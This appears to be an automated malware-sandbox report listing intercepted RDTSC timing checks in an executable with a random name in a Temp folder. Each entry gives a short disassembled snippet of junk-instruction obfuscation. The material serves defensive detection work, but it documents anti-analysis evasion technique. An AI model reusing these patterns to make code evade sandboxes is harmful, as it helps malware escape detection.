Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8AEFD second address: E8AF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B035 second address: E8B045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F47311907A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B045 second address: E8B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F473118FE5Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B053 second address: E8B06E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F47311907A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F47311907A6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B8A6 second address: E8B8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B8AC second address: E8B8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8B8B7 second address: E8B8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA45 second address: E8BA62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B3h 0x00000007 jl 00007F47311907A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA62 second address: E8BA85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F473118FE56h 0x0000000b pop edi 0x0000000c jmp 00007F473118FE5Bh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jo 00007F473118FE86h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA85 second address: E8BA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA8B second address: E8BA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA8F second address: E8BA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BA93 second address: E8BAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F473118FE5Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BC0E second address: E8BC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BC16 second address: E8BC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E5978C second address: E59792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E59792 second address: E597A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 js 00007F473118FE7Ah 0x0000000c push esi 0x0000000d jbe 00007F473118FE56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BEBD second address: E8BEC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47311907A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BEC9 second address: E8BEEC instructions: 0x00000000 rdtsc 0x00000002 je 00007F473118FE6Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BEEC second address: E8BF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BF01 second address: E8BF0B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F473118FE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BF0B second address: E8BF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F47311907AEh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8BF23 second address: E8BF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F473118FE5Fh 0x0000000a jmp 00007F473118FE63h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F473118FE68h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8C50D second address: E8C512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8C643 second address: E8C649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8C649 second address: E8C64D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8C977 second address: E8C9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F473118FE68h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jno 00007F473118FE5Eh 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F473118FE65h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8C9C3 second address: E8C9C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E90A96 second address: E90A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9614F second address: E96153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E96153 second address: E96177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE65h 0x00000007 jo 00007F473118FE56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E96177 second address: E96183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47311907A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E63984 second address: E6398C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6398C second address: E63992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E63992 second address: E63998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99BB4 second address: E99BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99BB8 second address: E99BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99BC7 second address: E99BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47311907B0h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99BDE second address: E99BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99037 second address: E9903E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99347 second address: E9934D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99789 second address: E9978E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E99A27 second address: E99A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9C6AB second address: E9C6B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9C818 second address: E9C81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9C81D second address: E9C824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9D2F8 second address: E9D2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9D416 second address: E9D41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9D4C5 second address: E9D4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9DD0B second address: E9DD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9E617 second address: E9E61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E9E47F second address: E9E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47311907ACh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA0D26 second address: EA0D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F473118FE56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA1557 second address: EA155B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA213D second address: EA2141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA155B second address: EA1561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA2141 second address: EA214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA214E second address: EA2153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA4940 second address: EA4946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA2153 second address: EA2164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47311907ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA4946 second address: EA494A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA8864 second address: EA8875 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47311907A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA8875 second address: EA887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EABA65 second address: EABA6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E56095 second address: E5609B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAD12F second address: EAD13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA4B42 second address: EA4B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F473118FE56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAE29A second address: EAE2DE instructions: 0x00000000 rdtsc 0x00000002 js 00007F47311907A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 clc 0x00000014 popad 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F47311907A8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA7B83 second address: EA7B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA5B4C second address: EA5B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAC36A second address: EAC36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAE2DE second address: EAE2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA5B51 second address: EA5B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA7B87 second address: EA7C10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push edi 0x0000000c mov dword ptr [ebp+122D2D5Ch], ecx 0x00000012 pop edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a and di, 284Bh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F47311907A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000017h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 or dword ptr [ebp+122D18D6h], ecx 0x00000046 mov eax, dword ptr [ebp+122D139Dh] 0x0000004c sub dword ptr [ebp+124743A3h], esi 0x00000052 push FFFFFFFFh 0x00000054 mov di, FB54h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jbe 00007F47311907B6h 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAD394 second address: EAD39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EA7C10 second address: EA7C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47311907B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAD39A second address: EAD3C0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F473118FE67h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB1310 second address: EB1314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB1314 second address: EB1318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB1318 second address: EB131E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB519E second address: EB51A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB51A4 second address: EB51A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB23BC second address: EB2455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F473118FE58h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+122D336Ah] 0x00000027 push edx 0x00000028 mov edi, dword ptr [ebp+122D260Bh] 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 jmp 00007F473118FE62h 0x0000003b or bh, FFFFFF81h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 cld 0x00000046 mov eax, dword ptr [ebp+122D0E5Dh] 0x0000004c mov ebx, dword ptr [ebp+122D2FDDh] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F473118FE58h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 00000017h 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e sbb bl, 0000005Ah 0x00000071 sub dword ptr [ebp+122D2336h], ebx 0x00000077 push eax 0x00000078 push esi 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB2455 second address: EB245B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB1468 second address: EB146C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB146C second address: EB1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EB1470 second address: EB1517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F473118FE58h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jns 00007F473118FE5Ch 0x00000028 sub di, 5ED0h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jbe 00007F473118FE5Dh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jmp 00007F473118FE60h 0x00000046 mov eax, dword ptr [ebp+122D0ED5h] 0x0000004c mov dword ptr [ebp+122D21A9h], edi 0x00000052 sub dword ptr [ebp+122D2DD0h], eax 0x00000058 push FFFFFFFFh 0x0000005a nop 0x0000005b push eax 0x0000005c jmp 00007F473118FE65h 0x00000061 pop eax 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jnl 00007F473118FE66h 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: EAE443 second address: EAE44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F47311907A6h 0x0000000a rdtsc
